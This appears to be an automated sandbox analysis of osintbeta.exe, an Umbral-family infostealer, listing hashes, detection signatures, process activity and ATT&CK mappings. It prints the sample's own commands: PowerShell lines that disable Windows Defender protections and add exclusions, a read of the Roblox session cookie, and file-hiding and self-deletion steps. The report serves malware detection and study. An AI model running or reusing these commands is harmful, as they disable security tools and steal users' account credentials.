Analysis
-
max time kernel
97s -
max time network
138s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20241023-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
30-11-2024 07:10
General
-
Target
osintbeta.exe
-
Size
631KB
-
MD5
651f9b8d2e6d57a5ad192c4f9e6bc5fe
-
SHA1
351d05c661abc76b335cb99b620a8a81367e41de
-
SHA256
10a0c83bc6522b597850d3871616715533031cba948807d3831b5a239d5d7f9b
-
SHA512
9573a78740c3ada200d282c34ffb07bc4f5549a7ddd5dcdf5f0070aba5be5cc0bdc0ab1bc54bd0283a43bc34febc5e0c7fb1ade6bb5173e598890be76445256b
-
SSDEEP
12288:hoZtL+EP8l1xMw2xpamPyAxVkghNiMdRC:fI8rxMw2xpamPyAxVkgriMdA
Malware Config
Signatures
-
Detect Umbral payload 1 IoCs
resource yara_rule behavioral1/memory/2372-1-0x00000256F96B0000-0x00000256F9754000-memory.dmp family_umbral -
Umbral family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 4968 powershell.exe 4712 powershell.exe 2664 powershell.exe 4588 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts osintbeta.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 20 discord.com 21 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 6 ip-api.com -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 3168 cmd.exe 3784 PING.EXE -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 4228 wmic.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 3784 PING.EXE -
Suspicious behavior: EnumeratesProcesses 31 IoCs
pid Process 4652 wmic.exe 4652 wmic.exe 4652 wmic.exe 4652 wmic.exe 2372 osintbeta.exe 4968 powershell.exe 4968 powershell.exe 4712 powershell.exe 4712 powershell.exe 2664 powershell.exe 2664 powershell.exe 1292 powershell.exe 1292 powershell.exe 2832 wmic.exe 2832 wmic.exe 2832 wmic.exe 2832 wmic.exe 1736 wmic.exe 1736 wmic.exe 1736 wmic.exe 1736 wmic.exe 60 wmic.exe 60 wmic.exe 60 wmic.exe 60 wmic.exe 4588 powershell.exe 4588 powershell.exe 4228 wmic.exe 4228 wmic.exe 4228 wmic.exe 4228 wmic.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2372 osintbeta.exe Token: SeIncreaseQuotaPrivilege 4652 wmic.exe Token: SeSecurityPrivilege 4652 wmic.exe Token: SeTakeOwnershipPrivilege 4652 wmic.exe Token: SeLoadDriverPrivilege 4652 wmic.exe Token: SeSystemProfilePrivilege 4652 wmic.exe Token: SeSystemtimePrivilege 4652 wmic.exe Token: SeProfSingleProcessPrivilege 4652 wmic.exe Token: SeIncBasePriorityPrivilege 4652 wmic.exe Token: SeCreatePagefilePrivilege 4652 wmic.exe Token: SeBackupPrivilege 4652 wmic.exe Token: SeRestorePrivilege 4652 wmic.exe Token: SeShutdownPrivilege 4652 wmic.exe Token: SeDebugPrivilege 4652 wmic.exe Token: SeSystemEnvironmentPrivilege 4652 wmic.exe Token: SeRemoteShutdownPrivilege 4652 wmic.exe Token: SeUndockPrivilege 4652 wmic.exe Token: SeManageVolumePrivilege 4652 wmic.exe Token: 33 4652 wmic.exe Token: 34 4652 wmic.exe Token: 35 4652 wmic.exe Token: 36 4652 wmic.exe Token: SeIncreaseQuotaPrivilege 4652 wmic.exe Token: SeSecurityPrivilege 4652 wmic.exe Token: SeTakeOwnershipPrivilege 4652 wmic.exe Token: SeLoadDriverPrivilege 4652 wmic.exe Token: SeSystemProfilePrivilege 4652 wmic.exe Token: SeSystemtimePrivilege 4652 wmic.exe Token: SeProfSingleProcessPrivilege 4652 wmic.exe Token: SeIncBasePriorityPrivilege 4652 wmic.exe Token: SeCreatePagefilePrivilege 4652 wmic.exe Token: SeBackupPrivilege 4652 wmic.exe Token: SeRestorePrivilege 4652 wmic.exe Token: SeShutdownPrivilege 4652 wmic.exe Token: SeDebugPrivilege 4652 wmic.exe Token: SeSystemEnvironmentPrivilege 4652 wmic.exe Token: SeRemoteShutdownPrivilege 4652 wmic.exe Token: SeUndockPrivilege 4652 wmic.exe Token: SeManageVolumePrivilege 4652 wmic.exe Token: 33 4652 wmic.exe Token: 34 4652 wmic.exe Token: 35 4652 wmic.exe Token: 36 4652 wmic.exe Token: SeDebugPrivilege 4968 powershell.exe Token: SeIncreaseQuotaPrivilege 4968 powershell.exe Token: SeSecurityPrivilege 4968 powershell.exe Token: SeTakeOwnershipPrivilege 4968 powershell.exe Token: SeLoadDriverPrivilege 4968 powershell.exe Token: SeSystemProfilePrivilege 4968 powershell.exe Token: SeSystemtimePrivilege 4968 powershell.exe Token: SeProfSingleProcessPrivilege 4968 powershell.exe Token: SeIncBasePriorityPrivilege 4968 powershell.exe Token: SeCreatePagefilePrivilege 4968 powershell.exe Token: SeBackupPrivilege 4968 powershell.exe Token: SeRestorePrivilege 4968 powershell.exe Token: SeShutdownPrivilege 4968 powershell.exe Token: SeDebugPrivilege 4968 powershell.exe Token: SeSystemEnvironmentPrivilege 4968 powershell.exe Token: SeRemoteShutdownPrivilege 4968 powershell.exe Token: SeUndockPrivilege 4968 powershell.exe Token: SeManageVolumePrivilege 4968 powershell.exe Token: 33 4968 powershell.exe Token: 34 4968 powershell.exe Token: 35 4968 powershell.exe -
Suspicious use of WriteProcessMemory 26 IoCs
description pid Process procid_target PID 2372 wrote to memory of 4652 2372 osintbeta.exe 80 PID 2372 wrote to memory of 4652 2372 osintbeta.exe 80 PID 2372 wrote to memory of 236 2372 osintbeta.exe 83 PID 2372 wrote to memory of 236 2372 osintbeta.exe 83 PID 2372 wrote to memory of 4968 2372 osintbeta.exe 85 PID 2372 wrote to memory of 4968 2372 osintbeta.exe 85 PID 2372 wrote to memory of 4712 2372 osintbeta.exe 88 PID 2372 wrote to memory of 4712 2372 osintbeta.exe 88 PID 2372 wrote to memory of 2664 2372 osintbeta.exe 90 PID 2372 wrote to memory of 2664 2372 osintbeta.exe 90 PID 2372 wrote to memory of 1292 2372 osintbeta.exe 92 PID 2372 wrote to memory of 1292 2372 osintbeta.exe 92 PID 2372 wrote to memory of 2832 2372 osintbeta.exe 96 PID 2372 wrote to memory of 2832 2372 osintbeta.exe 96 PID 2372 wrote to memory of 1736 2372 osintbeta.exe 99 PID 2372 wrote to memory of 1736 2372 osintbeta.exe 99 PID 2372 wrote to memory of 60 2372 osintbeta.exe 101 PID 2372 wrote to memory of 60 2372 osintbeta.exe 101 PID 2372 wrote to memory of 4588 2372 osintbeta.exe 103 PID 2372 wrote to memory of 4588 2372 osintbeta.exe 103 PID 2372 wrote to memory of 4228 2372 osintbeta.exe 105 PID 2372 wrote to memory of 4228 2372 osintbeta.exe 105 PID 2372 wrote to memory of 3168 2372 osintbeta.exe 107 PID 2372 wrote to memory of 3168 2372 osintbeta.exe 107 PID 3168 wrote to memory of 3784 3168 cmd.exe 109 PID 3168 wrote to memory of 3784 3168 cmd.exe 109 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 236 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\osintbeta.exe"C:\Users\Admin\AppData\Local\Temp\osintbeta.exe"1⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2372 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4652
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\osintbeta.exe"2⤵
- Views/modifies file attributes
PID:236
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\osintbeta.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4968
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 22⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4712
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2664
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1292
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2832
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1736
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵
- Suspicious behavior: EnumeratesProcesses
PID:60
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4588
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name2⤵
- Detects videocard installed
- Suspicious behavior: EnumeratesProcesses
PID:4228
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\osintbeta.exe" && pause2⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:3168 -
C:\Windows\system32\PING.EXEping localhost3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3784
-
-
Network
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD53eb3833f769dd890afc295b977eab4b4
SHA1e857649b037939602c72ad003e5d3698695f436f
SHA256c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485
SHA512c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72
-
Filesize
1KB
MD5c67441dfa09f61bca500bb43407c56b8
SHA15a56cf7cbeb48c109e2128c31b681fac3959157b
SHA25663082da456c124d0bc516d2161d1613db5f3008d903e4066d2c7b4e90b435f33
SHA512325de8b718b3a01df05e20e028c5882240e5fd2e96c771361b776312923ff178f27494a1f5249bf6d7365a99155eb8735a51366e85597008e6a10462e63ee0e8
-
Filesize
948B
MD50a9f768565b1feb241955d1491a980dc
SHA1e3b7888ce586b808a68c18e6cf3ea9625800306f
SHA2569580a44856a6859a9a1e6e7d4bfd902834cdde76ef9a94c21aed18d5f648d58b
SHA5122c8b6cf6a2de91e4c4e538e18aedc32c6f6a215458ac9864638023a3dbdc50b656b10d46ddf21e21e1f57066f485ee979d6ae036b95473520cd486e43ac064f5
-
Filesize
1KB
MD58e1fdd1b66d2fee9f6a052524d4ddca5
SHA10a9d0994559d1be2eecd8b0d6960540ca627bdb6
SHA2564cc7c1b79d1b48582d4dc27ca8c31457b9bf2441deb7914399bb9e6863f18b13
SHA5125a5494b878b08e8515811ab7a3d68780dac7423f5562477d98249a8bedf7ec98567b7cd5d4c6967d6bc63f2d6d9b7da9a65e0eb29d4b955026b469b5b598d1f3
-
Filesize
1KB
MD543a63637614b06cf4ca7e1b85c25b071
SHA11fefef7f0dfef9f9ba248f168a0c85314f5f4053
SHA2560f3ec5a874fe41abd67013b8481610202272468333616bf098ced19c1f271e6b
SHA5126396d789420a8a13367483ec6d7f288e437cf75527f11132285738587ce549f95587c32c56d023008b5725e465a76da244093707079b13216c057a550b4cc1d0
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82